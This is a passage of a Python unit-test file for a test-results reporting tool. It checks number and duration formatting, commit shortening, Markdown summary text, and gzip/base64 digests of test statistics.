self.assertEqual('a…▉', abbreviate_bytes('a»▉𝒂a»▉', 7))
self.assertEqual('a…', abbreviate_bytes('a»▉𝒂a»▉', 6))
self.assertEqual('a…', abbreviate_bytes('a»▉𝒂a»▉', 5))
self.assertEqual('a…', abbreviate_bytes('a»▉𝒂a»▉', 4))
self.assertEqual('…', abbreviate_bytes('a»▉𝒂a»▉', 3))
self.assertRaises(ValueError, lambda: abbreviate_bytes('abc', 2))
self.assertRaises(ValueError, lambda: abbreviate_bytes('abc', 1))
self.assertRaises(ValueError, lambda: abbreviate_bytes('abc', 0))
self.assertRaises(ValueError, lambda: abbreviate_bytes('abc', -1))
def test_get_test_name(self):
self.assertEqual('Unknown test', get_test_name(None, None, None))
self.assertEqual('test name', get_test_name(None, None, 'test name'))
self.assertEqual('class name ‑ Unknown test', get_test_name(None, 'class name', None))
self.assertEqual('class name ‑ test name', get_test_name(None, 'class name', 'test name'))
self.assertEqual('file name ‑ Unknown test', get_test_name('file name', None, None))
self.assertEqual('file name ‑ test name', get_test_name('file name', None, 'test name'))
self.assertEqual('file name ‑ class name ‑ Unknown test', get_test_name('file name', 'class name', None))
self.assertEqual('file name ‑ class name ‑ test name', get_test_name('file name', 'class name', 'test name'))
def test_get_formatted_digits(self):
self.assertEqual(get_formatted_digits(None), (3, 0))
self.assertEqual(get_formatted_digits(None, 1), (3, 0))
self.assertEqual(get_formatted_digits(None, 123), (3, 0))
self.assertEqual(get_formatted_digits(None, 1234), (5, 0))
self.assertEqual(get_formatted_digits(0), (1, 0))
self.assertEqual(get_formatted_digits(1, 2, 3), (1, 0))
self.assertEqual(get_formatted_digits(10), (2, 0))
self.assertEqual(get_formatted_digits(100), (3, 0))
self.assertEqual(get_formatted_digits(1234, 123, 0), (5, 0))
with temp_locale('en_US.utf8'):
self.assertEqual(get_formatted_digits(1234, 123, 0), (5, 0))
with temp_locale('de_DE.utf8'):
self.assertEqual(get_formatted_digits(1234, 123, 0), (5, 0))
self.assertEqual(get_formatted_digits(dict()), (3, 3))
self.assertEqual(get_formatted_digits(dict(number=1)), (1, 3))
self.assertEqual(get_formatted_digits(dict(number=12)), (2, 3))
self.assertEqual(get_formatted_digits(dict(number=123)), (3, 3))
self.assertEqual(get_formatted_digits(dict(number=1234)), (5, 3))
with temp_locale('en_US.utf8'):
self.assertEqual(get_formatted_digits(dict(number=1234)), (5, 3))
with temp_locale('de_DE.utf8'):
self.assertEqual(get_formatted_digits(dict(number=1234)), (5, 3))
self.assertEqual(get_formatted_digits(dict(delta=1)), (3, 1))
self.assertEqual(get_formatted_digits(dict(number=1, delta=1)), (1, 1))
self.assertEqual(get_formatted_digits(dict(number=1, delta=12)), (1, 2))
self.assertEqual(get_formatted_digits(dict(number=1, delta=123)), (1, 3))
self.assertEqual(get_formatted_digits(dict(number=1, delta=1234)), (1, 5))
with temp_locale('en_US.utf8'):
self.assertEqual(get_formatted_digits(dict(number=1, delta=1234)), (1, 5))
with temp_locale('de_DE.utf8'):
self.assertEqual(get_formatted_digits(dict(number=1, delta=1234)), (1, 5))
def test_get_magnitude(self):
self.assertEqual(None, get_magnitude(None))
self.assertEqual(+0, get_magnitude(+0))
self.assertEqual(-1, get_magnitude(-1))
self.assertEqual(+2, get_magnitude(+2))
self.assertEqual(None, get_magnitude(dict()))
self.assertEqual(+0, get_magnitude(dict(number=+0)))
self.assertEqual(+1, get_magnitude(dict(number=+1)))
self.assertEqual(-2, get_magnitude(dict(number=-2)))
self.assertEqual(3, get_magnitude(dict(number=3, delta=5)))
self.assertEqual(3, get_magnitude(dict(duration=3)))
self.assertEqual(3, get_magnitude(dict(duration=3, delta=5)))
self.assertEqual(None, get_magnitude(dict(delta=5)))
def test_get_delta(self):
self.assertEqual(None, get_delta(None))
self.assertEqual(None, get_delta(+0))
self.assertEqual(None, get_delta(-1))
self.assertEqual(None, get_delta(+2))
self.assertEqual(None, get_delta(dict()))
self.assertEqual(None, get_delta(dict(number=+0)))
self.assertEqual(None, get_delta(dict(number=+1)))
self.assertEqual(None, get_delta(dict(number=-2)))
self.assertEqual(5, get_delta(dict(number=3, delta=5)))
self.assertEqual(None, get_delta(dict(duration=3)))
self.assertEqual(5, get_delta(dict(duration=3, delta=5)))
self.assertEqual(5, get_delta(dict(delta=5)))
def test_as_short_commit(self):
self.assertEqual(as_short_commit(None), None)
self.assertEqual(as_short_commit(''), None)
self.assertEqual(as_short_commit('commit'), 'commit')
self.assertEqual(as_short_commit('0123456789abcdef'), '01234567')
self.assertEqual(as_short_commit('b469da3d223225fa3f014a3c9e9466b42a1471c5'), 'b469da3d')
def test_as_delta(self):
self.assertEqual(as_delta(0, 1), '±0')
self.assertEqual(as_delta(+1, 1), '+1')
self.assertEqual(as_delta(-2, 1), ' - 2')
self.assertEqual(as_delta(0, 2), '± 0')
self.assertEqual(as_delta(+1, 2), '+ 1')
self.assertEqual(as_delta(-2, 2), ' - 2')
self.assertEqual(as_delta(1, 5), '+ 1')
self.assertEqual(as_delta(12, 5), '+ 12')
self.assertEqual(as_delta(123, 5), '+ 123')
self.assertEqual(as_delta(1234, 5), '+1 234')
self.assertEqual(as_delta(1234, 6), '+ 1 234')
self.assertEqual(as_delta(123, 6), '+ 123')
with temp_locale('en_US.utf8'):
self.assertEqual(as_delta(1234, 5), '+1 234')
self.assertEqual(as_delta(1234, 6), '+ 1 234')
self.assertEqual(as_delta(123, 6), '+ 123')
with temp_locale('de_DE.utf8'):
self.assertEqual(as_delta(1234, 5), '+1 234')
self.assertEqual(as_delta(1234, 6), '+ 1 234')
self.assertEqual(as_delta(123, 6), '+ 123')
def test_as_stat_number(self):
label = 'unit'
self.assertEqual(as_stat_number(None, 1, 0, label), 'N/A unit')
self.assertEqual(as_stat_number(1, 1, 0, label), '1 unit')
self.assertEqual(as_stat_number(123, 6, 0, label), ' 123 unit')
self.assertEqual(as_stat_number(1234, 6, 0, label), ' 1 234 unit')
self.assertEqual(as_stat_number(12345, 6, 0, label), '12 345 unit')
with temp_locale('en_US.utf8'):
self.assertEqual(as_stat_number(123, 6, 0, label), ' 123 unit')
self.assertEqual(as_stat_number(1234, 6, 0, label), ' 1 234 unit')
self.assertEqual(as_stat_number(12345, 6, 0, label), '12 345 unit')
with temp_locale('de_DE.utf8'):
self.assertEqual(as_stat_number(123, 6, 0, label), ' 123 unit')
self.assertEqual(as_stat_number(1234, 6, 0, label), ' 1 234 unit')
self.assertEqual(as_stat_number(12345, 6, 0, label), '12 345 unit')
self.assertEqual(as_stat_number(dict(number=1), 1, 0, label), '1 unit')
self.assertEqual(as_stat_number(dict(number=1, delta=-1), 1, 1, label), '1 unit - 1 ')
self.assertEqual(as_stat_number(dict(number=2, delta=+0), 1, 1, label), '2 unit ±0 ')
self.assertEqual(as_stat_number(dict(number=3, delta=+1), 1, 1, label), '3 unit +1 ')
self.assertEqual(as_stat_number(dict(number=3, delta=+1), 1, 2, label), '3 unit + 1 ')
self.assertEqual(as_stat_number(dict(number=3, delta=+1), 2, 2, label), ' 3 unit + 1 ')
self.assertEqual(as_stat_number(dict(number=3, delta=+1234), 1, 6, label), '3 unit + 1 234 ')
self.assertEqual(as_stat_number(dict(number=3, delta=+12345), 1, 6, label), '3 unit +12 345 ')
with temp_locale('en_US.utf8'):
self.assertEqual(as_stat_number(dict(number=3, delta=+1234), 1, 6, label), '3 unit + 1 234 ')
self.assertEqual(as_stat_number(dict(number=3, delta=+12345), 1, 6, label), '3 unit +12 345 ')
with temp_locale('de_DE.utf8'):
self.assertEqual(as_stat_number(dict(number=3, delta=+1234), 1, 6, label), '3 unit + 1 234 ')
self.assertEqual(as_stat_number(dict(number=3, delta=+12345), 1, 6, label), '3 unit +12 345 ')
self.assertEqual(as_stat_number(dict(delta=-1), 3, 1, label), 'N/A unit - 1 ')
self.assertEqual(as_stat_number(dict(number=1, delta=-2, new=3), 1, 1, label), '1 unit - 2, 3 new ')
self.assertEqual(as_stat_number(dict(number=2, delta=+0, new=3, gone=4), 1, 1, label), '2 unit ±0, 3 new, 4 gone ')
self.assertEqual(as_stat_number(dict(number=3, delta=+1, gone=4), 1, 1, label), '3 unit +1, 4 gone ')
def test_as_stat_duration(self):
label = 'time'
self.assertEqual(as_stat_duration(None, label), 'N/A time')
self.assertEqual(as_stat_duration(0, None), '0s')
self.assertEqual(as_stat_duration(0, label), '0s time')
self.assertEqual(as_stat_duration(12, label), '12s time')
self.assertEqual(as_stat_duration(72, label), '1m 12s time')
self.assertEqual(as_stat_duration(3754, label), '1h 2m 34s time')
self.assertEqual(as_stat_duration(-3754, label), '1h 2m 34s time')
self.assertEqual(as_stat_duration(d(3754), label), '1h 2m 34s time')
self.assertEqual(as_stat_duration(d(3754, 0), label), '1h 2m 34s time ±0s')
self.assertEqual(as_stat_duration(d(3754, 1234), label), '1h 2m 34s time + 20m 34s')
self.assertEqual(as_stat_duration(d(3754, -123), label), '1h 2m 34s time - 2m 3s')
self.assertEqual(as_stat_duration(dict(delta=123), label), 'N/A time + 2m 3s')
def test_get_stats_digest_undigest(self):
digest = get_digest_from_stats(UnitTestRunResults(
files=1, errors=[], suites=2, duration=3,
tests=4, tests_succ=5, tests_skip=6, tests_fail=7, tests_error=8,
runs=9, runs_succ=10, runs_skip=11, runs_fail=12, runs_error=13,
commit='commit'
))
self.assertTrue(isinstance(digest, str))
self.assertTrue(len(digest) > 100)
stats = get_stats_from_digest(digest)
self.assertEqual(stats, UnitTestRunResults(
files=1, errors=[], suites=2, duration=3,
tests=4, tests_succ=5, tests_skip=6, tests_fail=7, tests_error=8,
runs=9, runs_succ=10, runs_skip=11, runs_fail=12, runs_error=13,
commit='commit'
))
def test_digest_ungest_string(self):
digest = digest_string('abc')
self.assertTrue(isinstance(digest, str))
self.assertTrue(len(digest) > 10)
string = ungest_string(digest)
self.assertEqual(string, 'abc')
def test_get_stats_from_digest(self):
self.assertEqual(
get_stats_from_digest('H4sIAAAAAAAC/0XOwQ6CMBAE0F8hPXtgEVT8GdMUSDYCJdv2ZP'
'x3psLW28zbZLIfM/E8BvOs6FKZkDj+SoMyJLGR/Yp6RcUh5lOr'
'+RWSc4DuD2/eALcCk+UZcC8winiBPCCS1rzXn1HnqC5wzBEpnH'
'PUKOgc5QedXxaOaJq+O+lMT3jdAAAA'),
UnitTestRunResults(
files=1, errors=[], suites=2, duration=3,
tests=4, tests_succ=5, tests_skip=6, tests_fail=7, tests_error=8,
runs=9, runs_succ=10, runs_skip=11, runs_fail=12, runs_error=13,
commit='commit'
)
)
def test_get_short_summary(self):
self.assertEqual('No tests found', get_short_summary(UnitTestRunResults(files=0, errors=[], suites=0, duration=123, tests=0, tests_succ=0, tests_skip=0, tests_fail=0, tests_error=0, runs=0, runs_succ=0, runs_skip=0, runs_fail=0, runs_error=0, commit='commit')))
self.assertEqual('10 tests found in 2m 3s', get_short_summary(UnitTestRunResults(files=1, errors=[], suites=2, duration=123, tests=10, tests_succ=0, tests_skip=0, tests_fail=0, tests_error=0, runs=0, runs_succ=0, runs_skip=0, runs_fail=0, runs_error=0, commit='commit')))
self.assertEqual('All 10 tests pass in 2m 3s', get_short_summary(UnitTestRunResults(files=1, errors=[], suites=2, duration=123, tests=10, tests_succ=10, tests_skip=0, tests_fail=0, tests_error=0, runs=0, runs_succ=0, runs_skip=0, runs_fail=0, runs_error=0, commit='commit')))
self.assertEqual('All 9 tests pass, 1 skipped in 2m 3s', get_short_summary(UnitTestRunResults(files=1, errors=[], suites=2, duration=123, tests=10, tests_succ=9, tests_skip=1, tests_fail=0, tests_error=0, runs=0, runs_succ=0, runs_skip=0, runs_fail=0, runs_error=0, commit='commit')))
self.assertEqual('2 fail, 1 skipped, 7 pass in 2m 3s', get_short_summary(UnitTestRunResults(files=1, errors=[], suites=2, duration=123, tests=10, tests_succ=7, tests_skip=1, tests_fail=2, tests_error=0, runs=0, runs_succ=0, runs_skip=0, runs_fail=0, runs_error=0, commit='commit')))
self.assertEqual('3 errors, 2 fail, 1 skipped, 4 pass in 2m 3s', get_short_summary(UnitTestRunResults(files=1, errors=[], suites=2, duration=123, tests=10, tests_succ=4, tests_skip=1, tests_fail=2, tests_error=3, runs=0, runs_succ=0, runs_skip=0, runs_fail=0, runs_error=0, commit='commit')))
self.assertEqual('2 fail, 8 pass in 2m 3s', get_short_summary(UnitTestRunResults(files=1, errors=[], suites=2, duration=123, tests=10, tests_succ=8, tests_skip=0, tests_fail=2, tests_error=0, runs=0, runs_succ=0, runs_skip=0, runs_fail=0, runs_error=0, commit='commit')))
self.assertEqual('3 errors, 7 pass in 2m 3s', get_short_summary(UnitTestRunResults(files=1, errors=[], suites=2, duration=123, tests=10, tests_succ=7, tests_skip=0, tests_fail=0, tests_error=3, runs=0, runs_succ=0, runs_skip=0, runs_fail=0, runs_error=0, commit='commit')))
self.assertEqual('1 parse errors', get_short_summary(UnitTestRunResults(files=1, errors=errors, suites=0, duration=0, tests=0, tests_succ=0, tests_skip=0, tests_fail=0, tests_error=0, runs=0, runs_succ=0, runs_skip=0, runs_fail=0, runs_error=0, commit='commit')))
self.assertEqual('1 parse errors, 4 pass in 2m 3s', get_short_summary(UnitTestRunResults(files=2, errors=errors, suites=1, duration=123, tests=4, tests_succ=4, tests_skip=0, tests_fail=0, tests_error=0, runs=0, runs_succ=0, runs_skip=0, runs_fail=0, runs_error=0, commit='commit')))
self.assertEqual('1 parse errors, 1 skipped, 4 pass in 2m 3s', get_short_summary(UnitTestRunResults(files=2, errors=errors, suites=1, duration=123, tests=5, tests_succ=4, tests_skip=1, tests_fail=0, tests_error=0, runs=0, runs_succ=0, runs_skip=0, runs_fail=0, runs_error=0, commit='commit')))
self.assertEqual('1 parse errors, 2 fail, 1 skipped, 4 pass in 2m 3s', get_short_summary(UnitTestRunResults(files=2, errors=errors, suites=1, duration=123, tests=7, tests_succ=4, tests_skip=1, tests_fail=2, tests_error=0, runs=0, runs_succ=0, runs_skip=0, runs_fail=0, runs_error=0, commit='commit')))
self.assertEqual('1 parse errors, 3 errors, 2 fail, 1 skipped, 4 pass in 2m 3s', get_short_summary(UnitTestRunResults(files=2, errors=errors, suites=1, duration=123, tests=10, tests_succ=4, tests_skip=1, tests_fail=2, tests_error=3, runs=0, runs_succ=0, runs_skip=0, runs_fail=0, runs_error=0, commit='commit')))
def test_get_short_summary_md(self):
self.assertEqual(get_short_summary_md(UnitTestRunResults(
files=1, errors=[], suites=2, duration=3,
tests=4, tests_succ=5, tests_skip=6, tests_fail=7, tests_error=8,
runs=9, runs_succ=10, runs_skip=11, runs_fail=12, runs_error=13,
commit='commit'
)), ('4 tests 5 :heavy_check_mark: 6 :zzz: 7 :x: 8 :fire:'))
def test_get_short_summary_md_with_delta(self):
self.assertEqual(get_short_summary_md(UnitTestRunDeltaResults(
files=n(1, 2), errors=[], suites=n(2, -3), duration=d(3, 4),
tests=n(4, -5), tests_succ=n(5, 6), tests_skip=n(6, -7), tests_fail=n(7, 8), tests_error=n(8, -9),
runs=n(9, 10), runs_succ=n(10, -11), runs_skip=n(11, 12), runs_fail=n(12, -13), runs_error=n(13, 14),
commit='commit',
reference_type='type', reference_commit='0123456789abcdef'
)), ('4 tests - 5 5 :heavy_check_mark: +6 6 :zzz: - 7 7 :x: +8 8 :fire: - 9 '))
def test_get_long_summary_md_with_single_runs(self):
self.assertEqual(get_long_summary_md(UnitTestRunResults(
files=1, errors=[], suites=2, duration=3,
tests=4, tests_succ=5, tests_skip=6, tests_fail=7, tests_error=8,
runs=4, runs_succ=5, runs_skip=6, runs_fail=7, runs_error=8,
commit='commit'
)), ('1 files 2 suites 3s :stopwatch:\n'
'4 tests 5 :heavy_check_mark: 6 :zzz: 7 :x: 8 :fire:\n'
'\n'
'Results for commit commit.\n'))
def test_get_long_summary_md_with_multiple_runs(self):
self.assertEqual(get_long_summary_md(UnitTestRunResults(
files=1, errors=[], suites=2, duration=3,
tests=4, tests_succ=5, tests_skip=6, tests_fail=7, tests_error=0,
runs=9, runs_succ=10, runs_skip=11, runs_fail=12, runs_error=0,
commit='commit'
)), ('1 files 2 suites 3s :stopwatch:\n'
'4 tests 5 :heavy_check_mark: 6 :zzz: 7 :x:\n'
'9 runs 10 :heavy_check_mark: 11 :zzz: 12 :x:\n'
'\n'
'Results for commit commit.\n'))
def test_get_long_summary_md_with_errors(self):
self.assertEqual(get_long_summary_md(UnitTestRunResults(
files=1, errors=[], suites=2, duration=3,
tests=4, tests_succ=5, tests_skip=6, tests_fail=7, tests_error=8,
runs=9, runs_succ=10, runs_skip=11, runs_fail=12, runs_error=13,
commit='commit'
)), ('1 files 2 suites 3s :stopwatch:\n'
'4 tests 5 :heavy_check_mark: 6 :zzz: 7 :x: 8 :fire:\n'
'9 runs 10 :heavy_check_mark: 11 :zzz: 12 :x: 13 :fire:\n'
'\n'
'Results for commit commit.\n'))
def test_get_long_summary_md_with_deltas(self):
self.assertEqual(get_long_summary_md(UnitTestRunDeltaResults(
files=n(1, 2), errors=[], suites=n(2, -3), duration=d(3, 4),
tests=n(4, -5), tests_succ=n(5, 6), tests_skip=n(6, -7), tests_fail=n(7, 8), tests_error=n(8, -9),
runs=n(9, 10), runs_succ=n(10, -11), runs_skip=n(11, 12), runs_fail=n(12, -13), runs_error=n(13, 14),
commit='123456789abcdef0', reference_type='type', reference_commit='0123456789abcdef'
)), ('1 files + 2 2 suites - 3 3s :stopwatch: +4s\n'
'4 tests - 5 5 :heavy_check_mark: + 6 6 :zzz: - 7 7 :x: + 8 8 :fire: - 9 \n'
'9 runs +10 10 :heavy_check_mark: - 11 11 :zzz: +12 12 :x: - 13 13 :fire: +14 \n'
'\n'
'Results for commit 12345678. ± Comparison against type commit 01234567.\n'))
def test_get_long_summary_md_with_details_url_with_fails(self):
self.assertEqual(get_long_summary_md(
UnitTestRunResults(
files=1, errors=[], suites=2, duration=3,
tests=4, tests_succ=5, tests_skip=6, tests_fail=7, tests_error=0,
runs=4, runs_succ=5, runs_skip=6, runs_fail=7, runs_error=0,
commit='commit'
),
'https://details.url/'
), ('1 files 2 suites 3s :stopwatch:\n'
'4 tests 5 :heavy_check_mark: 6 :zzz: 7 :x:\n'
'\n'
'For more details on these failures, see [this check](https://details.url/).\n'
'\n'
'Results for commit commit.\n')
)
def test_get_long_summary_md_with_details_url_with_errors(self):
self.assertEqual(get_long_summary_md(
UnitTestRunResults(
files=1, errors=[], suites=2, duration=3,
tests=4, tests_succ=5, tests_skip=6, tests_fail=0, tests_error=8,
runs=4, runs_succ=5, runs_skip=6, runs_fail=0, runs_error=8,
commit='commit'
),
'https://details.url/'
), ('1 files 2 suites 3s :stopwatch:\n'
'4 tests 5 :heavy_check_mark: 6 :zzz: 0 :x: 8 :fire:\n'
'\n'
'For more details on these errors, see [this check](https://details.url/).\n'
'\n'
'Results for commit commit.\n')
)
def test_get_long_summary_md_with_details_url_with_parse_errors(self):
self.assertEqual(get_long_summary_md(
UnitTestRunResults(
files=2, errors=errors, suites=2, duration=3,
tests=4, tests_succ=5, tests_skip=6, tests_fail=0, tests_error=0,
runs=4, runs_succ=5, runs_skip=6, runs_fail=0, runs_error=0,
commit='commit'
),
'https://details.url/'
), ('2 files 1 errors 2 suites 3s :stopwatch:\n'
'4 tests 5 :heavy_check_mark: 6 :zzz: 0 :x:\n'
'\n'
'For more details on these parsing errors, see [this check](https://details.url/).\n'
'\n'
'Results for commit commit.\n')
)
def test_get_long_summary_md_with_details_url_with_fails_and_errors_and_parse_errors(self):
self.assertEqual(get_long_summary_md(
UnitTestRunResults(
files=1, errors=errors, suites=2, duration=3,
tests=4, tests_succ=5, tests_skip=6, tests_fail=7, tests_error=8,
runs=4, runs_succ=5, runs_skip=6, runs_fail=7, runs_error=8,
commit='commit'
),
'https://details.url/'
), ('1 files 1 errors 2 suites 3s :stopwatch:\n'
'4 tests 5 :heavy_check_mark: 6 :zzz: 7 :x: 8 :fire:\n'
'\n'
'For more details on these parsing errors, failures and errors, see [this check](https://details.url/).\n'
'\n'
'Results for commit commit.\n')
)
def test_get_long_summary_md_with_details_url_without_fails_or_errors_or_parse_errors(self):
self.assertEqual(get_long_summary_md(
UnitTestRunResults(
files=1, errors=[], suites=2, duration=3,
tests=4, tests_succ=5, tests_skip=6, tests_fail=0, tests_error=0,
runs=4, runs_succ=5, runs_skip=6, runs_fail=0, runs_error=0,
commit='commit'
),
'https://details.url/'
), ('1 files 2 suites 3s :stopwatch:\n'
'4 tests 5 :heavy_check_mark: 6 :zzz: 0 :x:\n'
'\n'
'Results for commit commit.\n')
)
def test_get_long_summary_with_digest_md_with_single_run(self):
# makes gzipped digest deterministic
with mock.patch('gzip.time.time', return_value=0):
actual = get_long_summary_with_digest_md(
UnitTestRunResults(
files=1, errors=[], suites=2, duration=3,
tests=4, tests_succ=5, tests_skip=6, tests_fail=7, tests_error=8,
runs=4, runs_succ=5, runs_skip=6, runs_fail=7, runs_error=8,
commit='commit'
)
)
self.assertEqual(actual, '1 files 2 suites 3s :stopwatch:\n'
'4 tests 5 :heavy_check_mark: 6 :zzz: 7 :x: 8 :fire:\n'
'\n'
'Results for commit commit.\n'
'\n'
'[test-results]:data:application/gzip;base64,'
'H4sIAAAAAAAC/02MywqAIBQFfyVct+kd/UyEJVzKjKuuon/vZF'
'juzsyBOYWibbFiyIo8E9aTC1ACZs+TI7MDKyAO91x13KP1UkI0'
'v1jpgGg/oSbaILpPLMyGYXoY9nvsPTPNvfzXAiexwGlLGq3JAe'
'K6buousrLZAAAA')
def test_get_long_summary_with_digest_md_with_multiple_runs(self):
# makes gzipped digest deterministic
with mock.patch('gzip.time.time', return_value=0):
actual = get_long_summary_with_digest_md(
UnitTestRunResults(
files=1, errors=[], suites=2, duration=3,
tests=4, tests_succ=5, tests_skip=6, tests_fail=7, tests_error=0,
runs=9, runs_succ=10, runs_skip=11, runs_fail=12, runs_error=0,
commit='commit'
)
)
self.assertEqual(actual, '1 files 2 suites 3s :stopwatch:\n'
'4 tests 5 :heavy_check_mark: 6 :zzz: 7 :x:\n'
'9 runs 10 :heavy_check_mark: 11 :zzz: 12 :x:\n'
'\n'
'Results for commit commit.\n'
'\n'
'[test-results]:data:application/gzip;base64,'
'H4sIAAAAAAAC/03MwQqDMBAE0F+RnD24aiv6M0VShaVqZJOciv'
'/e0brR28wbmK8ZeRq86TLKM+Mjh6OUKO8ofWC3oFaoGMI+1Zpf'
'PloLeFzw4RXwTDD2PAGaBIOIE0gBkbjsf+0Z9Y6KBP87IoXzjk'
'qF+51188wBRdP2A3NU1srcAAAA')
def test_get_long_summary_with_digest_md_with_test_errors(self):
# makes gzipped digest deterministic
with mock.patch('gzip.time.time', return_value=0):
actual = get_long_summary_with_digest_md(
UnitTestRunResults(
files=1, errors=[], suites=2, duration=3,
tests=4, tests_succ=5, tests_skip=6, tests_fail=7, tests_error=8,
runs=9, runs_succ=10, runs_skip=11, runs_fail=12, runs_error=13,
commit='commit'
)
)
self.assertEqual(actual, '1 files 2 suites 3s :stopwatch:\n'
'4 tests 5 :heavy_check_mark: 6 :zzz: 7 :x: 8 :fire:\n'
'9 runs 10 :heavy_check_mark: 11 :zzz: 12 :x: 13 :fire:\n'
'\n'
'Results for commit commit.\n'
'\n'
'[test-results]:data:application/gzip;base64,'
'H4sIAAAAAAAC/0XOwQ6CMBAE0F8hPXtgEVT8GdMUSDYCJdv2ZP'
'x3psLW28zbZLIfM/E8BvOs6FKZkDj+SoMyJLGR/Yp6RcUh5lOr'
'+RWSc4DuD2/eALcCk+UZcC8winiBPCCS1rzXn1HnqC5wzBEpnH'
'PUKOgc5QedXxaOaJq+O+lMT3jdAAAA')
def test_get_long_summary_with_digest_md_with_parse_errors(self):
# makes gzipped digest deterministic
with mock.patch('gzip.time.time', return_value=0):
actual = get_long_summary_with_digest_md(
UnitTestRunResults(
files=1, errors=errors, suites=2, duration=3,
tests=4, tests_succ=5, tests_skip=6, tests_fail=7, tests_error=8,
runs=9, runs_succ=10, runs_skip=11, runs_fail=12, runs_error=13,
commit='commit'
)
)
self.assertEqual(actual, '1 files 1 errors 2 suites 3s :stopwatch:\n'
'4 tests 5 :heavy_check_mark: 6 :zzz: 7 :x: 8 :fire:\n'
'9 runs 10 :heavy_check_mark: 11 :zzz: 12 :x: 13 :fire:\n'
'\n'
'Results for commit commit.\n'
'\n'
'[test-results]:data:application/gzip;base64,'
'H4sIAAAAAAAC/0XOwQ6CMBAE0F8hPXtgEVT8GdMUSDYCJdv2ZP'
'x3psLW28zbZLIfM/E8BvOs6FKZkDj+SoMyJLGR/Yp6RcUh5lOr'
'+RWSc4DuD2/eALcCk+UZcC8winiBPCCS1rzXn1HnqC5wzBEpnH'
'PUKOgc5QedXxaOaJq+O+lMT3jdAAAA')
def test_get_long_summary_with_digest_md_with_delta(self):
# makes gzipped digest deterministic
with mock.patch('gzip.time.time', return_value=0):
actual = get_long_summary_with_digest_md(
UnitTestRunDeltaResults(
files=n(1, 2), errors=[], suites=n(2, -3), duration=d(3, 4),
tests=n(4, -5), tests_succ=n(5, 6), tests_skip=n(6, -7), tests_fail=n(7, 8), tests_error=n(8, -9),
runs=n(9, 10), runs_succ=n(10, -11), runs_skip=n(11, 12), runs_fail=n(12, -13), runs_error=n(13, 14),
commit='123456789abcdef0', reference_type='type', reference_commit='0123456789abcdef'
), UnitTestRunResults(
files=1, errors=[], suites=2, duration=3,
tests=4, tests_succ=5, tests_skip=6, tests_fail=7, tests_error=8,
runs=4, runs_succ=5, runs_skip=6, runs_fail=7, runs_error=8,
commit='commit'
)
)
self.assertEqual(actual, '1 files + 2 2 suites - 3 3s :stopwatch: +4s\n'
'4 tests - 5 5 :heavy_check_mark: + 6 6 :zzz: - 7 7 :x: + 8 8 :fire: - 9 \n'
'9 runs +10 10 :heavy_check_mark: - 11 11 :zzz: +12 12 :x: - 13 13 :fire: +14 \n'
'\n'
'Results for commit 12345678. ± Comparison against type commit 01234567.\n'
'\n'
'[test-results]:data:application/gzip;base64,'
'H4sIAAAAAAAC/02MywqAIBQFfyVct+kd/UyEJVzKjKuuon/vZF'
'juzsyBOYWibbFiyIo8E9aTC1ACZs+TI7MDKyAO91x13KP1UkI0'
'v1jpgGg/oSbaILpPLMyGYXoY9nvsPTPNvfzXAiexwGlLGq3JAe'
'K6buousrLZAAAA')
def test_get_long_summary_with_digest_md_with_delta_and_parse_errors(self):
# makes gzipped digest deterministic
with mock.patch('gzip.time.time', return_value=0):
actual = get_long_summary_with_digest_md(
UnitTestRunDeltaResults(
files=n(1, 2), errors=errors, suites=n(2, -3), duration=d(3, 4),
tests=n(4, -5), tests_succ=n(5, 6), tests_skip=n(6, -7), tests_fail=n(7, 8), tests_error=n(8, -9),
runs=n(9, 10), runs_succ=n(10, -11), runs_skip=n(11, 12), runs_fail=n(12, -13), runs_error=n(13, 14),
commit='123456789abcdef0', reference_type='type', reference_commit='0123456789abcdef'
), UnitTestRunResults(
files=1, errors=[], suites=2, duration=3,
tests=4, tests_succ=5, tests_skip=6, tests_fail=7, tests_error=8,
runs=4, runs_succ=5, runs_skip=6, runs_fail=7, runs_error=8,
commit='commit'
)
)
self.assertEqual(actual, '1 files + 2 1 errors 2 suites - 3 3s :stopwatch: +4s\n'
'4 tests - 5 5 :heavy_check_mark: + 6 6 :zzz: - 7 7 :x: + 8 8 :fire: - 9 \n'
'9 runs +10 10 :heavy_check_mark: - 11 11 :zzz: +12 12 :x: - 13 13 :fire: +14 \n'
'\n'
'Results for commit 12345678. ± Comparison against type commit 01234567.\n'
'\n'
'[test-results]:data:application/gzip;base64,'
'H4sIAAAAAAAC/02MywqAIBQFfyVct+kd/UyEJVzKjKuuon/vZF'
'juzsyBOYWibbFiyIo8E9aTC1ACZs+TI7MDKyAO91x13KP1UkI0'
'v1jpgGg/oSbaILpPLMyGYXoY9nvsPTPNvfzXAiexwGlLGq3JAe'
'K6buousrLZAAAA')
def test_get_long_summary_with_digest_md_with_delta_results_only(self):
with self.assertRaises(ValueError) as context:
get_long_summary_with_digest_md(UnitTestRunDeltaResults(
files=n(1, 2), errors=[], suites=n(2, -3), duration=d(3, 4),
tests=n(4, -5), tests_succ=n(5, 6), tests_skip=n(6, -7), tests_fail=n(7, 8), tests_error=n(8, -9),
runs=n(9, 10), runs_succ=n(10, -11), runs_skip=n(11, 12), runs_fail=n(12, -13), runs_error=n(13, 14),
commit='123456789abcdef0', reference_type='type', reference_commit='0123456789abcdef'
))
self.assertIn('stats must be UnitTestRunResults when no digest_stats is given', context.exception.args)
def test_get_case_messages(self):
results = UnitTestCaseResults([
((None, 'class1', 'test1'), dict([
('success', list([
UnitTestCase(result_file='result-file1', test_file='file1', line=1, class_name='class1', test_name='test1', result='success', message='message1', content='content1', time=1.0),
UnitTestCase(result_file='result-file1', test_file='file1', line=1, class_name='class1', test_name='test1', result='success', message='message1', content='content1', time=1.1),
UnitTestCase(result_file='result-file1', test_file='file1', line=1, class_name='class1', test_name='test1', result='success', message='message2', content='content2', time=1.2),
])),
('skipped', list([
UnitTestCase(result_file='result-file1', test_file='file1', line=1, class_name='class1', test_name='test1', result='skipped', message='message2', content='content2', time=None),
UnitTestCase(result_file='result-file1', test_file='file1', line=1, class_name='class1', test_name='test1', result='skipped', message='message3', content='content3', time=None),
])),
('failure', list([
UnitTestCase(result_file='result-file1', test_file='file1', line=1, class_name='class1', test_name='test1', result='failure', message='message4', content='content4', time=1.23),
UnitTestCase(result_file='result-file1', test_file='file1', line=1, class_name='class1', test_name='test1', result='failure', message='message4', content='content4', time=1.234),
])),
('error', list([
UnitTestCase(result_file='result-file1', test_file='file1', line=1, class_name='class1', test_name='test1', result='error', message='message5', content='content5', time=1.2345),
])),
])),
((None, 'class2', 'test2'), dict([
('success', list([
